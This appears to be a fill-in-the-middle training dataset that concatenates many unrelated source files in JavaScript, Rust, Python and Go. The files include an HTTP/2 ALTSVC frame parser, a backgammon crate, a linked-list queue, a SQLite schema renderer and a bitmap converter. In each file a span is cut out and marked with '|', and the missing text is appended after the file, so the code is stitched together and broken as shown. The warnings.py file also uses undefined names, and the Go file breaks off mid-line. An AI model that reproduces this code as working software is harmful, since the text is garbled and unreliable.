// defined in (Section 3)[https://tools.ietf.org/html/rfc7838#section-3]
// (ABNF production "Alt-Svc").
typeSpecificAttributes.ALTSVC = ['maxAge', 'port', 'protocolID', 'host',
'origin'];
function istchar(c) {
return ('!#$&\'*+-.^_`|~1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.indexOf(c) > -1);
}
function | (s) {
var t = '';
for (var i = 0; i < s.length; i++) {
if (!istchar(s[i])) {
t += '%';
t += new Buffer(s[i]).toString('hex');
} else {
t += s[i];
}
}
return t;
}
Serializer.ALTSVC = function writeAltSvc(frame, buffers) {
var buffer = new Buffer(2);
buffer.writeUInt16BE(frame.origin.length, 0);
buffers.push(buffer);
buffers.push(new Buffer(frame.origin, 'ascii'));
var fieldValue = hexencode(frame.protocolID) + '="' + frame.host + ':' + frame.port + '"';
if (frame.maxAge !== 86400) { // 86400 is the default
fieldValue += "; ma=" + frame.maxAge;
}
buffers.push(new Buffer(fieldValue, 'ascii'));
};
function stripquotes(s) {
var start = 0;
var end = s.length;
while ((start < end) && (s[start] === '"')) {
start++;
}
while ((end > start) && (s[end - 1] === '"')) {
end--;
}
if (start >= end) {
return "";
}
return s.substring(start, end);
}
function splitNameValue(nvpair) {
var eq = -1;
var inQuotes = false;
for (var i = 0; i < nvpair.length; i++) {
if (nvpair[i] === '"') {
inQuotes = !inQuotes;
continue;
}
if (inQuotes) {
continue;
}
if (nvpair[i] === '=') {
eq = i;
break;
}
}
if (eq === -1) {
return {'name': nvpair, 'value': null};
}
var name = stripquotes(nvpair.substring(0, eq).trim());
var value = stripquotes(nvpair.substring(eq + 1).trim());
return {'name': name, 'value': value};
}
function splitHeaderParameters(hv) {
return parseHeaderValue(hv, ';', splitNameValue);
}
function parseHeaderValue(hv, separator, callback) {
var start = 0;
var inQuotes = false;
var values = [];
for (var i = 0; i < hv.length; i++) {
if (hv[i] === '"') {
inQuotes = !inQuotes;
continue;
}
if (inQuotes) {
// Just skip this
continue;
}
if (hv[i] === separator) {
var newValue = hv.substring(start, i).trim();
if (newValue.length > 0) {
newValue = callback(newValue);
values.push(newValue);
}
start = i + 1;
}
}
var newValue = hv.substring(start).trim();
if (newValue.length > 0) {
newValue = callback(newValue);
values.push(newValue);
}
return values;
}
function rsplit(s, delim, count) {
var nsplits = 0;
var end = s.length;
var rval = [];
for (var i = s.length - 1; i >= 0; i--) {
if (s[i] === delim) {
var t = s.substring(i + 1, end);
end = i;
rval.unshift(t);
nsplits++;
if (nsplits === count) {
break;
}
}
}
if (end !== 0) {
rval.unshift(s.substring(0, end));
}
return rval;
}
function ishex(c) {
return ('0123456789ABCDEFabcdef'.indexOf(c) > -1);
}
function unescape(s) {
var i = 0;
var t = '';
while (i < s.length) {
if (s[i] != '%' || !ishex(s[i + 1]) || !ishex(s[i + 2])) {
t += s[i];
} else {
++i;
var hexvalue = '';
if (i < s.length) {
hexvalue += s[i];
++i;
}
if (i < s.length) {
hexvalue += s[i];
}
if (hexvalue.length > 0) {
t += new Buffer(hexvalue, 'hex').toString();
} else {
t += '%';
}
}
++i;
}
return t;
}
Deserializer.ALTSVC = function readAltSvc(buffer, frame) {
if (buffer.length < 2) {
return 'FRAME_SIZE_ERROR';
}
var originLength = buffer.readUInt16BE(0);
if ((buffer.length - 2) < originLength) {
return 'FRAME_SIZE_ERROR';
}
frame.origin = buffer.toString('ascii', 2, 2 + originLength);
var fieldValue = buffer.toString('ascii', 2 + originLength);
var values = parseHeaderValue(fieldValue, ',', splitHeaderParameters);
if (values.length > 1) {
// TODO - warn that we only use one here
}
if (values.length === 0) {
// Well that's a malformed frame. Just ignore it.
return;
}
var chosenAltSvc = values[0];
frame.maxAge = 86400; // Default
for (var i = 0; i < chosenAltSvc.length; i++) {
if (i === 0) {
// This corresponds to the protocolID="<host>:<port>" item
frame.protocolID = unescape(chosenAltSvc[i].name);
var hostport = rsplit(chosenAltSvc[i].value, ':', 1);
frame.host = hostport[0];
frame.port = parseInt(hostport[1], 10);
} else if (chosenAltSvc[i].name == 'ma') {
frame.maxAge = parseInt(chosenAltSvc[i].value, 10);
}
// Otherwise, we just ignore this
}
};
// BLOCKED
// ------------------------------------------------------------
//
// The BLOCKED frame (type=0xB) indicates that the sender is unable to send data
// due to a closed flow control window.
//
// The BLOCKED frame does not define any flags and contains no payload.
frameTypes[0xB] = 'BLOCKED';
frameFlags.BLOCKED = [];
typeSpecificAttributes.BLOCKED = [];
Serializer.BLOCKED = function writeBlocked(frame, buffers) {
};
Deserializer.BLOCKED = function readBlocked(buffer, frame) {
};
// [Error Codes](https://tools.ietf.org/html/rfc7540#section-7)
// ------------------------------------------------------------
var errorCodes = [
'NO_ERROR',
'PROTOCOL_ERROR',
'INTERNAL_ERROR',
'FLOW_CONTROL_ERROR',
'SETTINGS_TIMEOUT',
'STREAM_CLOSED',
'FRAME_SIZE_ERROR',
'REFUSED_STREAM',
'CANCEL',
'COMPRESSION_ERROR',
'CONNECT_ERROR',
'ENHANCE_YOUR_CALM',
'INADEQUATE_SECURITY',
'HTTP_1_1_REQUIRED'
];
// Logging
// -------
// [Bunyan serializers](https://github.com/trentm/node-bunyan#serializers) to improve logging output
// for debug messages emitted in this component.
exports.serializers = {};
// * `frame` serializer: it transforms data attributes from Buffers to hex strings and filters out
// flags that are not present.
var frameCounter = 0;
exports.serializers.frame = function(frame) {
if (!frame) {
return null;
}
if ('id' in frame) {
return frame.id;
}
frame.id = frameCounter;
frameCounter += 1;
var logEntry = { id: frame.id };
genericAttributes.concat(typeSpecificAttributes[frame.type]).forEach(function(name) {
logEntry[name] = frame[name];
});
if (frame.data instanceof Buffer) {
if (logEntry.data.length > 50) {
logEntry.data = frame.data.slice(0, 47).toString('hex') + '...';
} else {
logEntry.data = frame.data.toString('hex');
}
if (!('length' in logEntry)) {
logEntry.length = frame.data.length;
}
}
if (frame.promised_stream instanceof Object) {
logEntry.promised_stream = 'stream-' + frame.promised_stream.id;
}
logEntry.flags = Object.keys(frame.flags || {}).filter(function(name) {
return frame.flags[name] === true;
});
return logEntry;
};
// * `data` serializer: it simply transforms a buffer to a hex string.
exports.serializers.data = function(data) {
return data.toString('hex');
};
| hexencode |
lib.rs | //! # Backgammon: The Oldest Board Game of the World
//! This crate provides a pure, canonical implementation of the game
//! [*Backgammon*](https://en.wikipedia.org/wiki/Backgammon). It allows to
//! implement fast Backgammon games in various clients.
//!
//! ## Supported Doubling Cube Rules
//! This library supports the following rules on the doubling cube:
//!
//! * Beaver
//! * Raccoon
//! * Murphy
//! * Jacoby
//! * Crawford
//! * Holland
//!
//! ## Example
//! Start a new match with rules:
//! ```
//! use backgammon::{Match,Rules};
//!
//! let mut m = Match::new().
//! with_points(13).
//! with_jacoby();
//!
//! ```
//!
//! ## Discussions and Support
//! Any support is very welcome. Please use [Bitbucket
//! Issues](https://bitbucket.org/carlostrub/backgammon/issues?status=new&status=open) to discuss
//! features or ask for help.
//!
//! ## Source Code Integrity
//! All commits are signed with the following GPG key (find the respective key for example in the
//! [FreeBSD keyring](https://docs.freebsd.org/pgpkeys/pgpkeys.txt)):
//!
//! `59A6 2B5D B2FE B9CA 2358 4FA1 1C7A 2F39 D966 052B`
//!
//! You can verify the integrity of the code by running:
//!
//! `git log --show-signature`
#![warn(future_incompatible)]
#![deny(
missing_docs,
unused_variables,
missing_debug_implementations,
single_use_lifetimes,
trivial_casts,
trivial_numeric_casts,
unreachable_pub,
unsafe_code,
unused_extern_crates,
unused_import_braces,
unused_qualifications,
unused_results,
variant_size_differences
)] // be tough on code quality
use std::fmt;
use std::time::SystemTime;
use uuid::Uuid;
/// Represents a Backgammon match
#[derive(Debug)]
pub struct Match {
id: Uuid,
points: u32,
rules: CurrentRules,
games: Vec<Game>,
statistics: Statistics,
}
/// Holds the rules of the match
#[derive(Debug)]
struct CurrentRules {
/// When offered the cube, allow to re-double but keep it.
beaver: bool,
/// If a player plays "beaver", the other may double again, letting the opponent keep the cube.
raccoon: bool,
/// If both players roll the same opening number, the dice is doubled, remaining in the middle
/// of the board
murphy: bool,
/// How often to apply automatic doubling rule. 0 means always on.
murphy_limit: u8,
/// Gammon and Backgammon only count for double or triple values if the cube has already been
/// offered.
jacoby: bool,
/// When a player first reaches a score of points - 1, no doubling is allowed for the following
/// game.
crawford: bool,
/// Permits to double after Crawford game only if both players have rolled at least twice
holland: bool,
}
/// Holds various statistical information about a Match or a Game
#[derive(Debug, Clone, Copy)]
struct Statistics {
/// start time
time_start: SystemTime,
/// End time
time_end: SystemTime,
}
/// Implements the Backgammon rules
pub trait Rules {
/// When offered the cube, allow to re-double but keep it.
fn with_beaver(self) -> Self;
/// Return true if beaver rule is set
fn is_beaver(&self) -> bool;
/// If a player plays "beaver", the other may double again, letting the opponent keep the cube.
fn with_raccoon(self) -> Self;
/// Return true if Raccoon rule is set
fn is_raccoon(&self) -> bool;
/// If both players roll the same opening number, the dice is doubled, remaining in the middle
/// of the board
fn with_murphy(self, limit: u8) -> Self;
/// Return true if Murphy rule is set
fn is_murphy(&self) -> bool;
/// Gammon and Backgammon only count for double or triple values if the cube has already been
/// offered.
fn with_jacoby(self) -> Self;
/// Return true if Jacoby rule is set
fn is_jacoby(&self) -> bool;
/// When a player first reaches a score of points - 1, no doubling is allowed for the following
/// game.
fn with_crawford(self) -> Self;
/// Return true if Crawford rule is set
fn is_crawford(&self) -> bool;
/// Permits to double after Crawford game only if both players have rolled at least twice
fn with_holland(self) -> Self;
/// Return true if Holland rule is set
fn is_holland(&self) -> bool;
}
/// Backgammon defines certain errors
#[derive(Debug)]
pub enum Error {
/// Game has already started
StartedError,
/// Game has already ended
EndedError,
/// Opponent is playing
TurnError,
/// Opponent offered dice. Need to react on this event first.
DiceReceivedError,
/// Doubling not permitted
DoubleError,
}
impl std::error::Error for Error {}
impl fmt::Display for Error {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
Error::StartedError => write!(f, "Game has already started"),
Error::EndedError => write!(f, "Game has already ended"),
Error::TurnError => write!(f, "Opponent is playing"),
Error::DiceReceivedError => {
write!(
f,
"Opponent offered dice. Need to react on this event first."
)
}
Error::DoubleError => write!(f, "Doubling not permitted"),
}
}
}
/// This enum is used in several places, e.g. for cube ownership or for winner
#[derive(Debug, PartialEq, Clone, Copy)]
pub enum Player {
/// none of the two players, e.g. at start
Nobody,
/// Player 1
Player1,
/// Player 2
Player2,
}
/// Represents a Backgammon game
#[derive(Debug, Clone, Copy)]
pub struct Game {
/// how many points in the game?
pub points: u32,
/// who is the winner?
pub winner: Player,
/// last dice pair rolled
pub dices: (u8, u8),
/// whose turn is it?
pub who_plays: Player,
/// a board has 24 fields, the second tuple is the bar for Player 1 and 2, the third tuple is
/// the off for Player 1 and 2
pub board: ([i8; 24], (u8, u8), (u8, u8)),
/// cube displays the n-th power of 2, e.g. 2 -> 2^2 = 4
pub cube: u8,
/// who holds the cube
pub cube_owner: Player,
/// was cube offered to the one who plays?
pub cube_received: bool,
// Crawford rule: if crawford game, no doubling allowed
crawford: bool,
// Holland rule: if <4 rolls of crawford game, no doubling allowed
since_crawford: u8,
// Gather statistical information
statistics: Statistics,
}
/// Implements a Backgammon game
mod bg_game;
/// Implements a Backgammon match
mod bg_match;
/// Implements all Backgammon rules
mod bg_rules;
/// Implements certain Backgammon statistics
mod bg_statistics;
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn | () {
let m = Match::new().with_jacoby();
assert_eq!(
format!("The match rules are: {:?}", m.rules),
"The match rules are: CurrentRules { beaver: false, raccoon: false, murphy: false, murphy_limit: 0, jacoby: true, crawford: true, holland: false }"
);
}
#[test]
fn debug_current_rules() {
let r = CurrentRules::default().with_jacoby();
assert_eq!(
format!("The match rules are: {:?}", r),
"The match rules are: CurrentRules { beaver: false, raccoon: false, murphy: false, murphy_limit: 0, jacoby: true, crawford: true, holland: false }"
);
}
#[test]
fn debug_cubeowner() {
let o = Player::Nobody;
assert_eq!(
format!("The cube is owned by: {:?}", o),
"The cube is owned by: Nobody"
);
}
#[test]
fn debug_game() {
let g = Game::default();
let g_beginning = format!("{:?}", g);
assert_eq!(
g_beginning.get(0..16).unwrap(),
String::from("Game { points: 0")
);
}
}
| debug_match |
instruction.rs | use crate::tools::file_handler::split_with_expression;
#[derive(Clone, Debug)]
pub struct | {
pub command: String,
pub number: isize,
}
impl From<String> for Instruction {
fn from(s: String) -> Self {
let v = split_with_expression(&s, " ").expect("Unable to split");
let command: String = v[0].clone();
let number: isize = v[1].parse().unwrap();
Instruction {
command,
number
}
}
} | Instruction |
row_type.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from apache_beam.typehints import typehints
class RowTypeConstraint(typehints.TypeConstraint):
def __init__(self, fields):
self._fields = tuple(fields)
def _consistent_with_check_(self, sub):
return self == sub
def type_check(self, instance):
|
def _inner_types(self):
"""Iterates over the inner types of the composite type."""
return [field[1] for field in self._fields]
def __eq__(self, other):
return type(self) == type(other) and self._fields == other._fields
def __hash__(self):
return hash(self._fields)
def __repr__(self):
return 'Row(%s)' % ', '.join(
'%s=%s' % (name, typehints._unified_repr(t)) for name,
t in self._fields)
def get_type_for(self, name):
return dict(self._fields)[name]
| from apache_beam import Row
return isinstance(instance, Row) |
ProfileViewContainer.js | import {connect} from 'react-redux';
import ProfileView from './ProfileView';
export default connect(
state => {
return { | projects: state.get('projects')
};
}
)(ProfileView); | username: state.get('username'),
description: state.get('description'),
hours: state.get('hours'), |
queue_link_list.py | import sys, os
sys.path.append(os.path.abspath(os.path.join('..', 'linked_list')))
from LinkedList import linked_list
from node import Node
class queue_linked_list():
def __init__(self):
self.head = None
self.tail = None
def enqueue(self, value):
tempNode = Node(value)
if (self.tail):
self.tail.set_next(tempNode)
self.tail = tempNode
else:
self.head = tempNode
self.tail = tempNode
def dequeue(self):
if (self.empty() == False):
tempHeadNext = self.head.get_next()
result = self.head
if (tempHeadNext == None):
self.tail = None
else: | return "The queue is empty"
def empty(self):
if (self.head):
return False
else:
return True
def __str__(self):
current = self.head
output = ""
while current:
output += str(current) + " -> "
current = current.get_next()
output += " End "
return output | self.head = tempHeadNext
else: |
warnings.py | import inspect
class Warnings:
def __init__(self, config, user_data):
self._config = config
self._user_data = user_data
def _get_warnings(warnings_instance):
"""
returns a list of the returned value of
all private functions of warnings_instance
"""
# all functions of this class
warning_functions = inspect.getmembers(
warnings_instance.__class__, predicate=inspect.isfunction
)
# all private functions of this class, with the
# exclusion of __init__
warning_functions = [
wf
for wf in warning_functions
if not wf[0].startswith("__") and wf[0].startswith("_")
]
warnings = []
for _, function in warning_functions:
warnings.append(function(warnings_instance))
return [str(w) for w in warning if w is not None]
class CoreWarnings(Warnings):
"""
Warnings for all users (alumni or not)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
expiration = self.user_data["expiration"]
date = datetime.date(expiration.year, expiration.month, expiration.day)
now = datetime.datetime.now()
now = datetime.date(now.year, now.month, now.day)
self._expired = (date - now).days > 0
def _not_set_as_alumni(self):
if self._expired and not self._user_data["contract"] == "alumni":
return str("contract expired but not set " "alumni")
return []
def get(self):
"""
returns the list of warnings of the user
"""
return get_warnings(self)
class ActiveWarnings(Warnings):
"""
Warnings for "active" user (i.e. not alumni)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
def _attribute_not_set(self, attr):
user_value = self._user_data[attr]
if user_value is None:
return "{} is not set".format(attr)
if user_value == "false":
return "{} is not set".format(attr)
return None
def _firstname_not_set(self):
return self._attribute_not_set("firstname")
| return self._attribute_not_set("lastname")
def _ldap_not_set(self):
return self._attribute_not_set("ldap")
def _forms_status(self):
forms_sent = self._attribute_not_set("forms_sent")
if forms_sent is not None:
return forms_sent
forms_received = self._attribute_not_set("forms_received")
if forms_received is not None:
return forms_received
is_website = self._attribute_not_set("is_website")
return is_website
def _expiration_not_set(self):
return self._attribute_not_set("expiration")
def _contract_not_set(self):
return self._attribute_not_set("contract")
def _type_not_set(self):
return self._attribute_not_set("type")
def get(self):
"""
returns the list of warnings of the user
"""
# this execute all private functions of
# this class, each returning either None
# (no warning) or a string (warning message)
if self._user_data["contract"] == "alumni":
return []
return _get_warnings(self)
class TransitionWarnings(Warnings):
"""
Warnings for active users for which
the contract will soon expire
"""
def __init__(self, config, user_data, threshold_days=10):
super().__init__(config, user_data)
expiration = self.user_data["expiration"]
date = datetime.date(expiration.year, expiration.month, expiration.day)
now = datetime.datetime.now()
now = datetime.date(now.year, now.month, now.day)
self._expire_in = (date - now).days
self._threshold_days = threshold_days
def _no_closure_mail(self):
if not user_data["closure_mail"]:
return str(
"contract expires soon, " "but no closure contract has been sent"
)
return None
def get(self):
"""
returns the list of warnings of the user
"""
if self._expire_in > self.threshold_days:
return []
return _get_warnings(self)
class AlumniWarnings(Warnings):
"""
Warnings for "inactive" user (i.e alumni)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
def _not_vaulted(self):
if not self._user_data["vaulted"]:
return "user is not (ldap) vaulted"
return None
def _no_forwarder(self):
if not self._user_data["forwarder"]:
return str("user email has not been replaced " "by a forwarder")
return None
def _not_set_as_alumni(self):
if not self._user_data["website_alumni"]:
return str("user not set as alumni " "in the website")
return None
def _has_hardware(self):
if self._user_data["hardware"]:
return str("user still has some" "hardware")
return None
def _has_licenses(self):
if self._user_data["licenses"]:
return str("user still has some" "licenses")
return None
def _assets_in_is_snipe(self):
if not self._user_data["is_snipe_cleared"]:
return str("user may still have some " "assets deployed to in is-snipe")
def get(self):
"""
returns the list of warnings of the user
"""
if not self._user_data["contract"] == "alumni":
return []
return _get_warnings(self)
def all_warnings(self, config, user_data):
"""
returns the list of warnings (str)
of the user
"""
warnings_classes = list(Warnings.__subclasses__())
instances = [wc(config, user_data) for wc in warning_classes]
warnings = []
for instance in instances:
warnings.extend(instance.get())
return warnings | def _lastname_not_set(self): |
country.py | #!/usr/bin/python3
from __future__ import annotations
from typing import Dict
from requests import get
from json import dumps
from os.path import join, abspath, dirname, exists, realpath
from os import mkdir
def build(target_file: str = abspath(join(dirname(realpath(__file__)), '../data/country.json'))) -> Dict[str, str]:
|
if __name__ == '__main__':
try:
print(build())
except KeyboardInterrupt:
print('\n[!]Terminated :/')
finally:
exit(0)
| '''
Builds country info dataset.
First it fetches data from GeoNames data dumping site, then processes text data and converts to JSON. Finally stores it in provided file `/data/country.json`.
In success returns
`{'success': 'true'}`
else
`{'error': ' ... '}`
'''
code = {'error': 'incomplete'}
try:
if(not exists(dirname(target_file))):
# creates target data store directory, if that doesn't exists already
mkdir(dirname(target_file))
with open(target_file, mode='w') as fd:
fd.write(dumps(
{
'countries': [{'iso': country[0], 'iso3': country[1], 'isoNumeric': country[2], 'fips': country[3], 'country': country[4], 'capital': country[5], 'area(in sq km)': country[6], 'population': country[7], 'continent': country[8], 'tld': country[9], 'currencyCode': country[10], 'currencyName': country[11], 'phone': country[12], 'postalFormat': country[13], 'postalRegex': country[14], 'languages': country[15].split(','), 'geonameid': country[16], 'neighbours': country[17].split(','), 'equivalentFips': country[18]} for country in (line.split('\t') for line in get(
'http://download.geonames.org/export/dump/countryInfo.txt').text.split('\n') if(line and (not line.startswith('#'))))]
}, indent=4, ensure_ascii=False))
code = {'success': 'true'}
except Exception as e:
code = {'error': str(e)}
return code |
0005_recipe_image.py | # Generated by Django 2.2.14 on 2020-07-31 14:42
import core.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0004_recipe'),
]
operations = [
migrations.AddField(
model_name='recipe',
name='image',
field=models.ImageField(null=True, upload_to=core.models.recipe_image_file_path), | ),
] |
|
solution.py | # https://leetcode.com/problems/contains-duplicate
class Solution:
def containsDuplicate(self, nums):
hs = set()
for num in nums: | hs.add(num)
return len(hs) != len(nums) |
|
test_solo.py | from __future__ import absolute_import
import operator
from celery.concurrency import solo
from celery.utils.functional import noop
from celery.tests.case import AppCase
class test_solo_TaskPool(AppCase):
def | (self):
x = solo.TaskPool()
x.on_start()
def test_on_apply(self):
x = solo.TaskPool()
x.on_start()
x.on_apply(operator.add, (2, 2), {}, noop, noop)
def test_info(self):
x = solo.TaskPool()
x.on_start()
self.assertTrue(x.info)
| test_on_start |
sqlite_renderer.rs | use super::common::*;
use crate::{sql_schema_helpers::*, SqlFamily};
use once_cell::sync::Lazy;
use prisma_models::PrismaValue;
use regex::Regex;
use sql_schema_describer::*;
use std::borrow::Cow;
pub struct SqliteRenderer;
impl super::SqlRenderer for SqliteRenderer {
fn sql_family(&self) -> SqlFamily {
SqlFamily::Sqlite
}
fn quote<'a>(&self, name: &'a str) -> Quoted<&'a str> {
Quoted::Double(name)
}
fn render_column(&self, _schema_name: &str, column: ColumnRef<'_>, _add_fk_prefix: bool) -> String {
let column_name = self.quote(column.name());
let tpe_str = self.render_column_type(column.column_type());
let nullability_str = render_nullability(&column);
let default_str = column
.default()
.map(|default| format!("DEFAULT {}", self.render_default(default, &column.column.tpe.family)))
.unwrap_or_else(String::new);
let auto_increment_str = if column.auto_increment() {
"PRIMARY KEY AUTOINCREMENT"
} else {
""
};
format!(
"{} {} {} {} {}",
column_name, tpe_str, nullability_str, default_str, auto_increment_str
)
}
fn render_references(&self, _schema_name: &str, foreign_key: &ForeignKey) -> String {
let referenced_fields = foreign_key
.referenced_columns
.iter()
.map(Quoted::sqlite_ident)
.join(",");
format!(
"REFERENCES {referenced_table}({referenced_fields}) {on_delete_action} ON UPDATE CASCADE",
referenced_table = self.quote(&foreign_key.referenced_table),
referenced_fields = referenced_fields,
on_delete_action = render_on_delete(&foreign_key.on_delete_action)
)
}
fn | <'a>(&self, default: &'a DefaultValue, family: &ColumnTypeFamily) -> Cow<'a, str> {
match (default, family) {
(DefaultValue::DBGENERATED(val), _) => val.as_str().into(),
(DefaultValue::VALUE(PrismaValue::String(val)), ColumnTypeFamily::String)
| (DefaultValue::VALUE(PrismaValue::Enum(val)), ColumnTypeFamily::Enum(_)) => {
format!("'{}'", escape_quotes(&val)).into()
}
(DefaultValue::NOW, ColumnTypeFamily::DateTime) => "CURRENT_TIMESTAMP".into(),
(DefaultValue::NOW, _) => unreachable!("NOW default on non-datetime column"),
(DefaultValue::VALUE(val), ColumnTypeFamily::DateTime) => format!("'{}'", val).into(),
(DefaultValue::VALUE(val), _) => format!("{}", val).into(),
(DefaultValue::SEQUENCE(_), _) => unreachable!("rendering of sequence defaults"),
}
}
}
impl SqliteRenderer {
fn render_column_type(&self, t: &ColumnType) -> String {
match &t.family {
ColumnTypeFamily::Boolean => format!("BOOLEAN"),
ColumnTypeFamily::DateTime => format!("DATE"),
ColumnTypeFamily::Float => format!("REAL"),
ColumnTypeFamily::Int => format!("INTEGER"),
ColumnTypeFamily::String => format!("TEXT"),
x => unimplemented!("{:?} not handled yet", x),
}
}
}
fn escape_quotes(s: &str) -> Cow<'_, str> {
const STRING_LITERAL_CHARACTER_TO_ESCAPE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"'"#).unwrap());
STRING_LITERAL_CHARACTER_TO_ESCAPE_RE.replace_all(s, "'$0")
}
| render_default |
main.rs | use std::{env, process};
mod lib;
use lib::Config;
fn | () {
let args: Vec<String> = env::args().collect();
let config = Config::new(&args).unwrap_or_else(|err| {
eprintln!("Problem parsing arguments: {}", err);
process::exit(1);
});
if let Err(e) = lib::run(config) {
eprintln!("Application error: {}", e);
process::exit(1);
}
} | main |
stats_runner.py | import fix_paths
from models.author import Author
import basic_stats
from models.commit import Commit
import common
from models.file_diff import FileDiff
from models.hunk import Hunk
from models.patch import Patch
from collections import Counter, defaultdict
import pylab
import sqlalchemy
session = common.Session()
print 'Number of authors: %s' % (session.query(Author).count())
print 'Number of commits: %s' % (session.query(Commit).count())
# Max churn:
# select sum(lines_added),sum(lines_removed),sum(lines_added+lines_removed),new_file_path from hunks inner join file_diffs on hunks.file_diff_id = file_diffs.id group by new_file_path order by sum(lines_added+lines_removed);
def _print_histogram(histogram):
|
commit_counts = [count[0] for count in session.query(sqlalchemy.func.count(Commit.committer_email)).group_by(Commit.committer_email).all()]
author_counts = [count[0] for count in session.query(sqlalchemy.func.count(Commit.author_email)).group_by(Commit.author_email).all()]
pylab.figure()
pylab.hist([commit_counts, author_counts], 50, histtype='bar', color=['blue', 'yellow'], label=['Commit Counts', 'Authorship Counts'])
pylab.xlabel('Number of changes')
pylab.ylabel('Number of authors')
pylab.legend()
def remove_max(list):
list.remove(max(list))
return list
def detuple(list):
return [val[0] for val in list]
lines_added = remove_max(detuple(session.query(Patch.lines_added).all()))
lines_removed = remove_max(detuple(session.query(Patch.lines_removed).all()))
files_touched = remove_max(detuple(session.query(Patch.files_changed).all()))
pylab.figure()
pylab.hist([lines_added, lines_removed, files_touched], 50, histtype='bar', color=['blue', 'green', 'red'], label=['Lines Added', 'Lines Removed', 'Files Changed'], log=True)
pylab.legend()
lines_added_capped = filter(lambda x: x < 5000, lines_added)
lines_removed_capped = filter(lambda x: x < 5000, lines_removed)
files_touched_capped = filter(lambda x: x < 5000, files_touched)
pylab.figure()
pylab.hist([lines_added_capped , lines_removed_capped, files_touched_capped], 50, histtype='bar', color=['blue', 'green', 'red'], label=['Lines Added', 'Lines Removed', 'Files Changed'], log=True)
pylab.legend()
pylab.show()
| histogram_counts = [(count, len(values)) for count, values in histogram.iteritems()]
histogram_counts.sort(key=lambda key: key[0])
print histogram_counts |
bitmap_converter.py | #!/usr/bin/env python
'''This script converts from any image type supported by
Python imaging library to the RLE-encoded format used by
NxWidgets.
'''
from PIL import Image
def get_palette(img, maxcolors = 255):
'''Returns a list of colors. If there are too many colors in the image,
the least used are removed.
'''
img = img.convert("RGB")
colors = img.getcolors(65536)
colors.sort(key = lambda c: -c[0])
return [c[1] for c in colors[:maxcolors]]
def write_palette(outfile, palette):
'''Write the palette (normal and highlight) to the output file.'''
outfile.write('static const NXWidgets::nxwidget_pixel_t palette[BITMAP_PALETTESIZE] =\n');
outfile.write('{\n')
for i in range(0, len(palette), 4):
outfile.write(' ');
for r, g, b in palette[i:i+4]:
outfile.write('MKRGB(%3d,%3d,%3d), ' % (r, g, b))
outfile.write('\n');
outfile.write('};\n\n')
outfile.write('static const NXWidgets::nxwidget_pixel_t hilight_palette[BITMAP_PALETTESIZE] =\n');
outfile.write('{\n')
for i in range(0, len(palette), 4):
outfile.write(' ');
for r, g, b in palette[i:i+4]:
r = min(255, r + 50)
g = min(255, g + 50)
b = min(255, b + 50)
outfile.write('MKRGB(%3d,%3d,%3d), ' % (r, g, b))
outfile.write('\n');
outfile.write('};\n\n')
def quantize(color, palette):
'''Return the color index to closest match in the palette.'''
try:
return palette.index(color)
except ValueError:
# No exact match, search for the closest
def distance(color2):
return sum([(a - b)**2 for a, b in zip(color, color2)])
return palette.index(min(palette, key = distance));
def encode_row(img, palette, y):
'''RLE-encode one row of image data.'''
entries = []
color = None
repeats = 0
for x in range(0, img.size[0]):
c = quantize(img.getpixel((x, y)), palette)
if c == color and repeats < 255:
repeats += 1
else:
if color is not None:
entries.append((repeats, color))
repeats = 1
color = c
if color is not None:
entries.append((repeats, color))
return entries
def write_image(outfile, img, palette):
'''Write the image contents to the output file.'''
outfile.write('static const NXWidgets::SRlePaletteBitmapEntry bitmap[] =\n');
outfile.write('{\n');
for y in range(0, img.size[1]):
entries = encode_row(img, palette, y)
row = ""
for r, c in entries:
if len(row) > 60:
outfile.write(' ' + row + '\n')
row = ""
row += '{%3d, %3d}, ' % (r, c)
row += ' ' * (73 - len(row))
outfile.write(' ' + row + '/* Row %d */\n' % y)
outfile.write('};\n\n');
def write_descriptor(outfile, name):
'''Write the public descriptor structure for the image.'''
outfile.write('extern const struct NXWidgets::SRlePaletteBitmap g_%s =\n' % name)
outfile.write('{\n')
outfile.write(' CONFIG_NXWIDGETS_BPP,\n')
outfile.write(' CONFIG_NXWIDGETS_FMT,\n')
outfile.write(' BITMAP_PALETTESIZE,\n') | outfile.write(' BITMAP_HEIGHT,\n')
outfile.write(' {palette, hilight_palette},\n')
outfile.write(' bitmap\n')
outfile.write('};\n')
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 3:
print "Usage: bitmap_converter.py source.png output.cxx"
sys.exit(1)
img = Image.open(sys.argv[1]).convert("RGB")
outfile = open(sys.argv[2], 'w')
palette = get_palette(img)
outfile.write(
'''
/* Automatically NuttX bitmap file. */
/* Generated from %(src)s by bitmap_converter.py. */
#include <nxconfig.hxx>
#include <crlepalettebitmap.hxx>
#define BITMAP_WIDTH %(width)s
#define BITMAP_HEIGHT %(height)s
#define BITMAP_PALETTESIZE %(palettesize)s
''' % {'src': sys.argv[1], 'width': img.size[0], 'height': img.size[1],
'palettesize': len(palette)}
)
name = os.path.splitext(os.path.basename(sys.argv[1]))[0]
write_palette(outfile, palette)
write_image(outfile, img, palette)
write_descriptor(outfile, name) | outfile.write(' BITMAP_WIDTH,\n') |
main.go | package main
import (
"pixiublog/jobs"
"pixiublog/models"
_ "pixiublog/routers"
"pixiublog/utils"
"time"
"github.com/astaxie/beego"
)
func init() {
//初始化数据模型
var StartTime = time.Now().Unix()
models.Init(StartTime)
jobs.InitJobs()
}
func main() {
//添加自定义的模板函数
addTemplateFunc()
beego.Run()
}
func addTemplateFunc() {
beego.AddFunc | ils.NumEq)
